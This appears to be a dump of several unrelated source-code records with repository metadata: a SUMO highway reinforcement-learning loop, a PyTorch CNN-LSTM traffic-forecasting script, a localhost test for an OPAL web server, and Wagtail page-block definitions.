speed_violation_list = []
for i in range (number_of_games):
sumoBinary = checkBinary('sumo') # Traing + gui --> computational cost!
traci.start([sumoBinary, "-c", "highway.sumocfg", "--start"]) # Start the simulation.
veh.remove()
done = False
step = 0
episode_reward = 0
accident_times = 0
out_road_times = 0
emg_reach_end = 0
total_rewards = 0
speed_violation_times = 0
same_lane_times = 0
initial_eps = 1
eps_decay = 0.0005
eps = initial_eps - (eps_decay * i)
for i in range (2): # Two simulation steps at the begining before adding vehicles
traci.simulationStep()
veh.add()
veh.control()
while done is False :
current_state = sim_1.observation()
# exploration v.s exploitation (First more explore then explot)
if eps > epsilon :
rand_action = random.randrange(len(action)) # First explore
else :
rand_action = np.argmax (agent.get_qs(state = current_state)) # Then explot (predict the next state)
sim_1.action_func(rand_action)
traci.simulationStep()
new_state = sim_1.observation()
# info: ego_collision, out_of_road, change_lane, ego_emg_same_lane, speed_violation
new_state, reward, done, info = sim_1.step(rand_action)
if info[2] == True :
emg_reach_end += 1
if info[3] == True :
same_lane_times += 1
if info[4] == True :
speed_violation_times += 1
step += 1
episode_reward += reward
sample = [current_state, rand_action, new_state, reward, done]
experiences.append(sample)
emg_reach_end_list.append(emg_reach_end)
ego_emg_same_list.append(same_lane_times)
speed_violation_list.append(speed_violation_times)
steps.append(step)
traci.close()
if info [0] == True :
accident_times = 1
accidents_list.append(accident_times)
if info[1] == True :
out_road_times = 1
out_of_roads_list.append(out_road_times)
if len(experiences) < max_size_memory:
experiences.append(sample)
if len(experiences) == max_size_memory:
experiences.pop(0)
# Get a batch form filled memory.
if len (experiences) > batch_size * 2 :
minibatch = random.sample(experiences, batch_size)
experiences = []
agent.train( termination_state = done , minibatch = minibatch)
current_state = new_state
rewards.append(episode_reward)
s = np.arange(0, number_of_games + 1, step=5)
len_s = len(s)
for i in range (len_s - 1):
reward_avg = np.average(rewards[s[i]:s[i+1]])
reward_avg_list.append(reward_avg)
print ("rewards",rewards)
print ("reward_length", len(rewards))
print ("average_rewards", reward_avg_list)
print ("avg_reward_len", len(reward_avg_list))
# Save the model
agent.save_model()
# visual.reward_plot(reward= rewards)
visual.general_plot (accidents=accidents_list, out_of_roads =out_of_roads_list,
same_lane_emg=ego_emg_same_list, emg_reach_end=emg_reach_end_list, steps= steps, speed_violation=speed_violation_list)
#Scatter Plot reward function
visual.reward_plot(reward = rewards)
#Scatter Plot average reward function
visual.reward_avg_plot(avg_reward = reward_avg_list)
#Line Plot
visual.reward_plot_plot(reward=rewards)
visual.totext(rewards=rewards, avg_reward= reward_avg_list, accidents=accidents_list, out_of_roads=out_of_roads_list, same_lane_emg= ego_emg_same_list,
emg_reach_end=emg_reach_end_list, steps=steps, speed_violation= speed_violation_list)
| [
"shoaraee@unbc.ca"
] | shoaraee@unbc.ca |
556e2612f70e3c88aa89821db124fb46ae1b0e0a | 232fb54bc7692f9c007b6d589d2bf57e84380d54 | /CNN/TestCode.py | 4d5760f563d21410866dc5050bddc6b2d3ffe90b | [] | no_license | x543586417/Mathorcup2020 | 871157a24bf87baab4f6f34f54f46e5e22786ddf | fa122b1c893414f2a7591af491b5b09fbdd365f2 | refs/heads/master | 2023-02-17T16:59:21.946205 | 2021-01-20T08:29:52 | 2021-01-20T08:29:52 | 329,033,348 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 12,467 | py | import numpy as np
from pandas import DataFrame
from torch import nn
import torch
import matplotlib.pyplot as plt
from torch.autograd import Variable
import pandas as pd
import statsmodels.api as sm
# from date_utils import get_gran, format_timestamp
"""
对上面的package进行整理
numpy是一个张量包
matplotlib.pyplot主要是用来生成图片和列表的
pandas是一个用于数据分析的包
torch.nn是神经网络包
"""
"""
STEP1 怎么表示出相应的预测准确度
STEP2
"""
# 设置网络参数
BATCH_SIZE = 24
HIDDEN_SIZE = 128
# 设置数据集(考虑滑动窗口即batch_size,所以新构造的数据集长度必定为原长-batch_size
# ,然后这边X,Y分别是输出值,输出值,根据X来求Y,因为是训练集,所以Y告诉你)
def create_dataset(dataset, loop_back=BATCH_SIZE):
dataX, dataY = [], []
for i in range(len(dataset) - loop_back):
a = dataset[i:(i + loop_back)] # 这边的话,因为切片是不包含的末尾位的,所以a是两个数据组成
dataX.append(a)
dataY.append(dataset[i + loop_back])
return np.array(dataX), np.array(dataY)
loss_train = []
loss_pre = []
x = []
# 导入数据
data_csv = pd.read_csv('处理后数据/test3.csv', encoding='gbk')
for i in data_csv['Cell_num'].unique():
data = np.array(data_csv[data_csv['Cell_num'] == i]['Download'])
# a = data_csv[data_csv['Cell_num'] == i]
# a = a[a['Day'] <= 31]
# data1 = np.array(a['Download'])
# a = data_csv[data_csv['Cell_num'] == i]
# a = a[a['Day'] > 31]
# data2 = np.array(a['Download'])
# max_value_3 = np.max(data1)
# min_value_3 = np.min(data1)
# max_value_4 = np.max(data2)
# min_value_4 = np.min(data2)
# data1 = list(map(lambda x: (x - min_value_3) / (max_value_3 - min_value_3), data1))
# data2 = list(map(lambda x: (x - min_value_4) / (max_value_4 - min_value_4), data2))
# data = data1 + data2
# 数据预处理(去除无效数据)
# dataset = data.astype('float32')
# data_csv2 = dataset[1:, np.newaxis]
# print(type(dataset))
# 归一化处理,之前的归一化处理是归一化到0-1上,现在想试一下归一化到更大范围内的情况。
max_value = np.max(data)
min_value = np.min(data)
mu = np.mean(data, axis=0)
std = np.std(data, axis=0)
scalar = max_value - min_value
# 除最大值法归一化
# dataset = list(map(lambda x : x / scalar, data_csv2)) # 归一化处理
# MinMaxScaler法
# data = list(map(lambda x: (x - min_value) / (max_value - min_value), data))
# 均值归一化
data = list(map(lambda x: (x - mu) / std, data))
# 缩放到特定区域,[0-10]
# dataset = list(map(lambda x: x / scalar * 10, data))
# 创建好输入输出
# data_X,data_Y的size是(142,2,1)(142,1),三维的数据把第一个数据当作数量,后面才是行列
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
data_X, data_Y = create_dataset(data)
# 设置训练集和测试集
# 划分训练集和测试机,其中70%作为训练集,30%位测试集,用切片来实现
# train部分,Y是给喂的数据,以便调整参数,test部分Y是用来验证正确率的
# 这边的数据集是一个三维数组
# 前三个数据集是要放到网络里的,最后一个是用于验证的
train_size = int(len(data_X) * 42 / 49)
train_X = data_X[:train_size]
train_Y = data_Y[:train_size]
test_X = data_X[train_size:]
test_Y = data_Y[train_size:]
# 设置LSTM模型数据及状态(格式统一化)
# 让数据集变成仅一列,且z轴为2(batch_size)的数据结构,为了和LSTM的结构匹配
# train_X: 99,1,2
# train_Y: 99,1
# test_X: 43,1,2
train_X = train_X.reshape(-1, 1, BATCH_SIZE) # np.reshape中的-1参数表示自适应,即-1的这个位置的值有其他位置来决定
train_Y = train_Y.reshape(-1, 1, 1)
test_X = test_X.reshape(-1, 1, BATCH_SIZE)
test_Y = test_Y.reshape(-1, 1, 1)
# 将数据从numpy的array转换为torch的tensor类型
# 所以要用GPU的话,应该要放更前面的原始数据那块进行
# 这边用torch.tensor应该
# train_x, train_y, test_x 的大小分别为99 1 2, 99 1 1 43 1 2
train_x = torch.Tensor(train_X)
# print(train_x.shape)
train_y = torch.Tensor(train_Y)
# print(train_y.shape)
test_x = torch.Tensor(test_X)
test_y = torch.Tensor(test_Y)
# 建立LSTM模型
class lstm(nn.Module):
"""
建立本题适合的LSTM数据,输入数据大小为2,隐藏层个数为4,输出大小为1,隐藏层的层数为2,
这些内容需要数据与之匹配,根据前面的知识可知,我们的数据集需要设置成对应的大小即
这边的话层数设置为2,一层是LSTM,另一层是简单的线形层
"""
def __init__(self, input_size=BATCH_SIZE, hidden_size=HIDDEN_SIZE,
output_size=1, num_layer=2):
super(lstm, self).__init__()
# 当我们的LSTM网络要求输入是2,隐藏层是4,层数为2,输出为1时
# 我们的输入输出格式是:
# train_X: 99,1,2
# train_Y: 99,1
# test_X: 43,1,2
# 也就是说第一个参数是指元素的个数,不需要和LSTM中匹配,然后后面开始要和LSTM匹配
self.layer0 = nn.Sequential(
nn.Conv1d(1, 24, kernel_size=2, padding=1),
nn.ReLU(True)
)
self.layer1 = nn.LSTM(input_size, hidden_size, num_layer, dropout=0.5) # 2 4 2
self.layer2 = nn.LSTM(hidden_size, hidden_size * 2, num_layer, dropout=0.5) # 2 4 2
self.layer3 = nn.Sequential(
nn.Linear(hidden_size * 2, hidden_size),
nn.Tanh(),
nn.Linear(hidden_size, output_size), # 线性层 4 1
)
# 前向传播
# 要注意的是这边输出的几个参数的size是什么样的
# 然后view在这边的作用是:
def forward(self, x):
x = self.layer0(x)
x, _ = self.layer1(x) #
x, _ = self.layer2(x)
s, b, h = x.size() # 99 1 4 应该是说输入的x从9912 变成了 9914
x = x.view(s * b, h) # 为了通过线性层,将x的格式改成了99,4 说明4是输入需要
# print(x.shape)
x = self.layer3(x) # 通过线性层得到的结果是: 99 1 是线性层的作用吧 输入4 输出1
# print(x.shape)
x = x.view(s, b, -1) # 这边把格式转换成:扩维了 99 1 1 和train_Y保持一致
# print(x.shape)
return x
# TODO CUDA
# model = lstm(BATCH_SIZE, 8, 1, 2)
model = lstm(BATCH_SIZE, HIDDEN_SIZE, 1, 2).to(device) # 输入为2,隐藏层为4,输出为1,层数为2,这边和输入有对应
# 建立损失函数和优化器
# TODO CUDA
# criterion = nn.MSELoss()
criterion = nn.MSELoss().to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
# torch.optim.lr_scheduler.CosineAnnealingLR()
# var_x = torch.tensor(train_x, dtype=torch.float32, device=device)
# var_y = torch.tensor(train_y, dtype=torch.float32, device=device)
# TODO CUDA
var_x = Variable(train_x).to(device)
# var_x = var_x
var_y = Variable(train_y).to(device)
# var_y = var_y
# 模型训练
for e in range(100):
# var_x,var_y的格式应该和train_x,y 一样,都是9912 9911
# 前向传播
out = model(var_x) # 这边的out应该是model下训练出来的output
loss = criterion(out, var_y) # 这是一个内部函数,只需要把两个要比较的张量放进去就行了
loss_train.append(float(loss.data))
var_test_x = Variable(test_x).to(device)
var_test_y = Variable(test_y).to(device)
pred_test = model(var_test_x).to(device)
loss1 = criterion(pred_test, var_test_y)
loss_pre.append(float(loss1.data))
# 反向传播
# 在反向传播的地方进行优化
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (e + 1) % 100 == 0: # 每 100 次输出结果
print('Epoch: {}, Loss: {:.7f}'.format(e + 1, loss.data))
print('Loss: {:.7f}'.format(loss1.data))
# torch.save(model.state_dict(), 'I:\\file\\newpytorch\\net.pth')
# torch.save(model.state_dict(), 'I:\\file\\newpytorch\\net3435.pth')
# torch.save(model.state_dict(), 'I:\\file\\newpytorch\\net3536.pth')
# torch.save(model.state_dict(), 'net318319.pth')
torch.save(model.state_dict(), 'net408-2.pth')
# 感觉有些地方还是不太对,尤其是正确率方面
print("save!")
## net存的是第一次训练的结果。
## 3/4-3/5调参结果存到net3435中
## net基本设置:BATCH_SIZE为288(24h),线性层就单一层Linear。
## 3435改动:BATCH_SIZE改为12(1h) ,线性层改为双Linear。s
## 3536改动:BATCH_SIZE改为72(6h),六个小时试一下。
## 3637改动:BATCH_SIZE改为144(12h),这次应该算是最后一次对batchsize进行测试了,后续要对LSTM网络进行测试。
## 318319改动:BATCH_SIZE仍为144,HIDDEN_SIZE=32
# TODO CUDA
model1 = lstm().to(device)
# model1.load_state_dict(torch.load('I:\\file\\newpytorch\\net.pth'))
# model1.load_state_dict(torch.load('I:\\file\\newpytorch\\net3435.pth'))
# model1.load_state_dict(torch.load('I:\\file\\newpytorch\\net3536.pth'))
model1.load_state_dict(torch.load('net408-2.pth'))
model1.eval()
print('load successfully!')
# 模型预测
# 不知道能不能直接通过调model的类型来实现测试模式的转换 ,这边还要再看下内容 。
# model = model.eval()
# model = model.eval().to(device) # 转换成测试模式
# 我们考虑的test_x放进去 然后进行结果预测
# TODO CUDA
var_test_x = Variable(test_x).to(device)
var_test_y = Variable(test_y).to(device)
# var_test_x = Variable(test_x)
# var_test_y = Variable(test_y)
# data_X = data_X.reshape(-1, 1, BATCH_SIZE)
# data_X = torch.Tensor(data_X)
# var_data = Variable(data_X) # variable相当于是一个装tensor的存储空间,应该有其他默认参数的
# # variable有一个非常大的作用,即反向误差传递的时候可以比tensor要快非常多
# TODO CUDA
pred_test = model1(var_test_x).to(device) # 测试集的预测结果
# # 改变输出的格式,即从variable形式转换为numpy or tensor类型
# pred_test = pred_test.view(-1).data.numpy()
pred_test = model1(var_test_x).to(device)
loss1 = criterion(pred_test, var_test_y)
print(var_test_y.size())
print(len(var_test_y))
print('Loss: {:.7f}'.format(loss1.data))
running_correct = 0
# wucha = float(20) / scalar
for i in range(var_test_y.size(0)):
if (abs((pred_test[i] - var_test_y[i]) / var_test_y[i]) < 0.05):
running_correct += 1
print(running_correct)
# 画出实际结果和预测的结果
# plt.title('Result Analysis')
pred_T_t = pred_test[:, 0]
pred_N = pred_T_t.data.cpu().numpy()
pred_N = pred_N * std + mu
var_test_y_T = var_test_y[:, 0]
var_test_y_N = var_test_y_T.data.cpu().numpy()
var_test_y_N = var_test_y_N * std + mu
plt.plot(var_test_y_N, 'r', label='real')
plt.plot(pred_N, 'b', label='pred')
plt.savefig("test.png", dpi=300)
plt.xlabel('number')
plt.ylabel('value')
plt.show()
plt.plot(loss_train, 'r', label='train_loss')
plt.xlabel('Loss')
plt.xlabel('Step')
plt.show()
plt.savefig("训练集Loss.png", dpi=300)
lt = DataFrame(loss_train)
lt.to_csv("训练集Loss.csv", index=False)
plt.plot(loss_pre, 'r', label='pre_loss')
plt.xlabel('Loss')
plt.xlabel('Step')
plt.show()
plt.savefig("测试集Loss.png", dpi=300)
l_pre = DataFrame(loss_pre)
l_pre.to_csv("测试集Loss.csv", index=False)
# plt.legend(loc='best')
# plt.plot(pred_y, 'r', label='pred')
# plot里面的alpha作用是
# plt.plot(data_y, 'b', label='real', alpha=0.3)
# plt.plot([train_size, train_size], [-1, 2], color='k', label='train | pred')
# plt.legend(loc='best')
# plt.savefig('lstm_reg.png')
# plt.pause(4)
| [
"xiaoweliang@qq.com"
] | xiaoweliang@qq.com |
d2333889ef1fc70d5e7c0a79e6f3112aa752306a | 6fc84acaaf012f6cbbcb918390a4ed5508f84414 | /opalWebsrv/test.py | 5f5f02fee393637efbf17662b5ee5d476b2f476d | [] | no_license | missinglpf/MAS_finite_consenus | 43f03bdb2417c6da98cb5ff5a6b8b888ec1944b3 | a83e8709dd12e5965ef4a5b413d056a434dd1245 | refs/heads/master | 2020-08-01T03:42:44.747402 | 2018-06-25T06:01:10 | 2018-06-25T06:01:10 | 210,850,495 | 3 | 0 | null | 2019-09-25T13:20:32 | 2019-09-25T13:20:32 | null | UTF-8 | Python | false | false | 2,298 | py | #! /usr/bin/python
import struct
import socket
import urllib
import subprocess
import sys
import time
import os
import traceback
def portIsOpened(hostip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((hostip,port))
if result == 0:
return True
else:
return False
def fakeOpalCom(vals, the_format_in, the_format_out, hostip, port):
sock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
d4= struct.pack(the_format_out, *vals)
sent=sock.sendto(d4, (hostip, port))
print "Opal sends", vals
rawdata,server=sock.recvfrom(4096)
sock.close()
data = struct.unpack(the_format_in, rawdata)
print "Opal recvd", data
return data
def testsrv(http_port, opal_port, nbIn, nbOut):
print "Testing with a new set"
assert(not(portIsOpened('127.0.0.1',http_port)))
assert(not(portIsOpened('127.0.0.1',opal_port)))
p = subprocess.Popen([os.getcwd()+ "/opalWebSrv.py", "-s", "-I", str(nbIn), "-O", str(nbOut)], bufsize=1024, stdin=sys.stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
time.sleep(0.5)
the_format_in='<hih'+str(nbIn)+'d'
the_format_out='<hih'+str(nbOut)+'d'
HTTP_PORT=str(8000)
UDP_IP='127.0.0.1'
UDP_PORT=50000
vals=[1,2,3]+range(1,nbOut+1)
opalret = fakeOpalCom(vals, the_format_in, the_format_out, UDP_IP, UDP_PORT)
assert(opalret==tuple([1,0,8*nbIn]+[0 for i in range(nbIn)]))
f=urllib.urlopen('http://localhost:'+HTTP_PORT+'/asyncsrv/set?valin0=12.5&valin1=40.2')
print f.read()
f=urllib.urlopen('http://localhost:'+HTTP_PORT+'/asyncsrv/get?name0=valout0&name1=valout1')
ret=f.read()
print ret
assert(ret=='{"valout0": 1.0, "valout1": 2.0}')
vals=[1,2,3,10.]+range(2,nbOut+1)
opalret = fakeOpalCom(vals, the_format_in, the_format_out, UDP_IP, UDP_PORT)
assert(opalret==tuple([1,1,8*nbIn]+[12.5,40.2]+ [0 for i in range(nbIn-2)]))
f=urllib.urlopen('http://localhost:'+HTTP_PORT+'/asyncsrv/get?name0=valout0&name1=valout1')
assert(f.read()=='{"valout0": 10.0, "valout1": 2.0}')
except Exception as error:
p.kill()
traceback.print_exc()
raise(error)
p.kill()
params_list = [
{"http_port": 8000, "opal_port": 50000,"nbIn":16, "nbOut":16},
{"http_port": 8001, "opal_port": 50001,"nbIn":10, "nbOut":12}
]
for params in params_list:
testsrv(**params)
print "Testing succeeded"
| [
"tunglam87@gmail.com"
] | tunglam87@gmail.com |
43dcac20edd103067c8fa3fce010b8162d077b2a | 552ba370742e346dbb1cf7c7bf4b99648a17979b | /tbx/services/blocks.py | cbd8282834c2d89bfbac3f75334fcd64d1e9a9a5 | [
"MIT"
] | permissive | arush15june/wagtail-torchbox | 73e5cdae81b524bd1ee9c563cdc8a7b5315a809e | c4d06e096c72bd8007975dc016133024f9d27fab | refs/heads/master | 2022-12-25T05:39:32.309635 | 2020-08-13T14:50:42 | 2020-08-13T14:50:42 | 299,591,277 | 0 | 0 | MIT | 2020-09-29T11:08:49 | 2020-09-29T11:08:48 | null | UTF-8 | Python | false | false | 3,242 | py | from wagtail.core.blocks import (CharBlock, ListBlock, PageChooserBlock,
RichTextBlock, StreamBlock, StructBlock,
TextBlock, URLBlock)
from wagtail.images.blocks import ImageChooserBlock
from tbx.core.blocks import PullQuoteBlock
class CaseStudyBlock(StructBlock):
title = CharBlock(required=True)
intro = TextBlock(required=True)
case_studies = ListBlock(StructBlock([
('page', PageChooserBlock('work.WorkPage')),
('title', CharBlock(required=False)),
('descriptive_title', CharBlock(required=False)),
('image', ImageChooserBlock(required=False)),
]))
class Meta:
template = 'blocks/services/case_study_block.html'
class HighlightBlock(StructBlock):
title = CharBlock(required=True)
intro = RichTextBlock(required=False)
highlights = ListBlock(TextBlock())
class Meta:
template = 'blocks/services/highlight_block.html'
class StepByStepBlock(StructBlock):
title = CharBlock(required=True)
intro = TextBlock(required=False)
steps = ListBlock(StructBlock([
('subtitle', CharBlock(required=False)),
('title', CharBlock(required=True)),
('icon', CharBlock(max_length=9000, required=True, help_text='Paste SVG code here')),
('description', RichTextBlock(required=True))
]))
class Meta:
template = 'blocks/services/step_by_step_block.html'
class PeopleBlock(StructBlock):
title = CharBlock(required=True)
intro = RichTextBlock(required=True)
people = ListBlock(PageChooserBlock())
class Meta:
template = 'blocks/services/people_block.html'
class FeaturedPagesBlock(StructBlock):
title = CharBlock()
pages = ListBlock(StructBlock([
('page', PageChooserBlock()),
('image', ImageChooserBlock()),
('text', TextBlock()),
('sub_text', CharBlock(max_length=100)),
]))
class Meta:
template = 'blocks/services/featured_pages_block.html'
class SignUpFormPageBlock(StructBlock):
page = PageChooserBlock('sign_up_form.SignUpFormPage')
def get_context(self, value, parent_context=None):
context = super(SignUpFormPageBlock, self).get_context(value, parent_context)
context['form'] = value['page'].sign_up_form_class()
return context
class Meta:
icon = 'doc-full'
template = 'blocks/services/sign_up_form_page_block.html'
class LogosBlock(StructBlock):
title = CharBlock()
intro = CharBlock()
logos = ListBlock(StructBlock((
('image', ImageChooserBlock()),
('link_page', PageChooserBlock(required=False)),
('link_external', URLBlock(required=False)),
)))
class Meta:
icon = 'site'
template = 'blocks/services/logos_block.html'
class ServicePageBlock(StreamBlock):
paragraph = RichTextBlock(icon="pilcrow")
case_studies = CaseStudyBlock()
highlights = HighlightBlock()
pull_quote = PullQuoteBlock(template='blocks/services/pull_quote_block.html')
process = StepByStepBlock()
people = PeopleBlock()
featured_pages = FeaturedPagesBlock()
sign_up_form_page = SignUpFormPageBlock()
logos = LogosBlock()
| [
"karl@torchbox.com"
] | karl@torchbox.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.